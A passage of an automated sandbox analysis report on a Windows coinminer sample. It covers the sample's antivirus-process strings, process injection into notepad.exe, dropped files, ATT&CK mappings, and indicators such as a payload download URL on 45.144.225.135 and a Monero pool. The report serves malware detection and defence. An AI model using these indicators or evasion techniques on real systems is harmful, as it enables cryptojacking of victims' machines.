                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings:

                        barindex
                        Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                        Source: P7Oa6i5muL.exeBinary or memory string: bdagent.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: cmdagent.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: vsserv.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: cfp.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: avp.exe
                        Source: svchost.exe, 00000016.00000002.461861426.000001D596641000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: a2start.exe
                        Source: svchost.exe, 00000016.00000002.461728537.000001D596613000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: a2guard.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: a2service.exe
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation1Startup Items1Startup Items1Disable or Modify Tools11Input Capture1System Information Discovery23Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScripting11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1LSASS MemorySecurity Software Discovery251Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsNative API1Registry Run Keys / Startup Folder2Process Injection622Scripting11Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder2Obfuscated Files or Information2NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing21LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading21Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion41/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection622Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 448402 Sample: P7Oa6i5muL Startdate: 14/07/2021 Architecture: WINDOWS Score: 100 54 xmr-us-east1.nanopool.org 2->54 66 Multi AV Scanner detection for domain / URL 2->66 68 Antivirus detection for URL or domain 2->68 70 Multi AV Scanner detection for dropped file 2->70 72 8 other signatures 2->72 9 P7Oa6i5muL.exe 5 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 9 1 2->15         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 48 C:\Users\user\AppData\...\P7Oa6i5muL.exe, PE32 9->48 dropped 50 C:\Users\...\P7Oa6i5muL.exe:Zone.Identifier, ASCII 9->50 dropped 52 C:\Users\user\AppData\...\P7Oa6i5muL.exe.log, ASCII 9->52 dropped 82 Writes to foreign memory regions 9->82 84 Injects a PE file into a foreign processes 9->84 20 P7Oa6i5muL.exe 6 9->20         started        86 Changes security center settings (notifications, updates, antivirus, firewall) 13->86 25 MpCmdRun.exe 1 13->25         started        62 127.0.0.1 unknown unknown 15->62 64 192.168.2.1 unknown unknown 15->64 file6 signatures7 process8 dnsIp9 56 45.144.225.135, 49719, 80 DEDIPATH-LLCUS Netherlands 20->56 42 C:\ProgramData\LKBNMTFJgl\csrss, PE32 20->42 dropped 44 C:\ProgramData\LKBNMTFJgl\r.vbs, data 20->44 dropped 74 Multi AV Scanner detection for dropped file 20->74 76 Detected unpacking (creates a PE file in dynamic memory) 20->76 78 Writes to foreign memory regions 20->78 80 4 other signatures 20->80 27 notepad.exe 20->27         started        31 cmd.exe 1 20->31         started        33 jwMZjhPggeDR.exe 20->33 injected 35 conhost.exe 25->35         started        file10 signatures11 process12 dnsIp13 58 144.217.14.139, 14444, 49721 OVHFR Canada 27->58 60 xmr-us-east1.nanopool.org 27->60 88 System process connects to network (likely due to code injection or exploit) 27->88 37 wscript.exe 1 31->37         started        40 conhost.exe 31->40         started        signatures14 90 Detected Stratum mining protocol 58->90 process15 file16 46 C:\Users\user\AppData\...\viTRMUuKeV.url, MS 37->46 dropped

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        P7Oa6i5muL.exe20%VirustotalBrowse
                        P7Oa6i5muL.exe21%ReversingLabsWin32.Coinminer.BitCoinMiner

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\LKBNMTFJgl\csrss21%ReversingLabsWin32.Coinminer.BitCoinMiner
                        C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe21%ReversingLabsWin32.Coinminer.BitCoinMiner

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        6.2.jwMZjhPggeDR.exe.35d0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                        6.0.jwMZjhPggeDR.exe.35d0000.3.unpack100%AviraTR/ATRAPS.GenDownload File
                        5.2.P7Oa6i5muL.exe.4f3c38.1.unpack100%AviraHEUR/AGEN.1127349Download File
                        5.2.P7Oa6i5muL.exe.3320000.3.unpack100%AviraTR/Dropper.GenDownload File
                        6.0.jwMZjhPggeDR.exe.35d0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                        5.2.P7Oa6i5muL.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                        6.0.jwMZjhPggeDR.exe.35d0000.5.unpack100%AviraTR/ATRAPS.GenDownload File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://45.144.225.135/notepad.exe14%VirustotalBrowse
                        http://45.144.225.135/notepad.exe100%Avira URL Cloudmalware
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://45.144.225.135/config.txtll0%Avira URL Cloudsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://fontfabrik.com0%URL Reputationsafe
                        http://fontfabrik.com0%URL Reputationsafe
                        http://fontfabrik.com0%URL Reputationsafe
                        http://fontfabrik.com0%URL Reputationsafe
                        http://45.144.225.135/config.txte=C:0%Avira URL Cloudsafe
                        http://45.144.225.135/config.txtx0%Avira URL Cloudsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://45.144.225.135/config.txt0%Avira URL Cloudsafe
                        https://www.tiktok.com/legal/report/feedback0%Avira URL Cloudsafe
                        https://activity.windows.comt0%Avira URL Cloudsafe
                        https://%s.xboxlive.com0%URL Reputationsafe
                        https://%s.xboxlive.com0%URL Reputationsafe
                        https://%s.xboxlive.com0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        https://dynamic.t0%URL Reputationsafe
                        https://dynamic.t0%URL Reputationsafe
                        https://dynamic.t0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://45.144.225.135/config.txtL0%Avira URL Cloudsafe
                        https://RtlGetVersionntdll.dll0%Avira URL Cloudsafe
                        https://%s.dnet.xboxlive.com0%URL Reputationsafe
                        https://%s.dnet.xboxlive.com0%URL Reputationsafe
                        https://%s.dnet.xboxlive.com0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        xmr-us-east1.nanopool.org
                        		142.44.242.100
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://45.144.225.135/config.txtfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.fontbureau.com/designersGP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                              		high
                              https://t0.tiles.ditu.live.com/tiles/gen19svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpfalse
                                		high
                                http://45.144.225.135/notepad.exeP7Oa6i5muL.exetrue
                                • 14%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
